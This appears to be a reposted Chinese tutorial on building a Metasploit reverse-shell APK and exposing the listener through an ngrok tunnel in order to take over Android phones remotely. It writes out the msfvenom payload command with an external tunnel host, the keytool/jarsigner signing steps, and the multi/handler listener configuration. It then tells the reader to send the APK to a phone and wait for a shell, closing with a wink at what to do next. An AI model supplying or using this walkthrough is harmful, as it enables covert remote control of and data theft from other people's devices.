kali 公網/內網穿透 滲透安卓/電腦


環境:

圖片.png

Kali Linux系統(https://www.kali.org/downloads/)

圖片.png

Metasploit

圖片.png

Ngrok Linux64位的端口轉發工具(https://www.ngrok.cc/)

1.在Kali Linux里面打開https://www.ngrok.cc,下載里面的Linux 64位的端口轉發工具,到Kali Linux桌面備用

圖片.png

圖片.png

然后小伙伴需要自己去https://www.ngrok.cc/注冊一個帳號來開通一個免費的隧道,用於接下來的端口映射。

2.設置隧道:

圖片.png

隧道協議選擇TCP的,本地端口輸入Kali Linux 的IP地址而端口號可以任意不要沖突就行了

設置好ngrok隧道之后就打開指定的sunny路徑運行端口轉發腳本。

 

./sunny clientid id

 

圖片.png

這個是端口轉發腳本成功運行的樣子

3. 用Metasploit生成載有惡意Payload的Android的apk並且簽名apk:

在Kali Linux里面打開一個新的窗口輸入

 

msfvenom -p android/meterpreter/reverse_tcp LHOST=free.ngrok.cc LPORT=11*** R > /root/Desktop/123.apk

圖片.png

執行下列命令簽名。首先使用密鑰工具創建密鑰庫。

 

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

然后使用JARsigner簽名APK

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore 123.apk aliasname

再用JARsigner驗證簽名

jarsigner -verify -verbose -certs 123.apk

如果你嫌上面的簽名apk的步驟很麻煩就直接在手機下載一個MT管理器進行對apk的簽名既方便又快捷。

4.使用Metasploit進行測試:

接下來啟動metasploit的監聽器。執行msfconsole打開控制台。

 

use exploit/multi/handler 

Set PAYLOAD android/meterpreter/reverse_tcp 

SET LHOST 192.168.253.128(Kali的Linux內網IP) 

SET LPORT 2222(隧道的端口號)

Exploit

 

然后將載有payload的APK發送到手機上安裝等待反彈shell

圖片.png

接受反彈shell成功

 

sessions查看反彈shell

圖片.png

 

 sessions -i [ID]進行回話操作

圖片.png

剩下的大家應該知道怎么做了(眼神暗示)

注:如果你Kali linux的內網IP變了,可以直接在隧道修改成你的內網IP然后在set LHOST設置成你內網IP然后run監聽即可。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM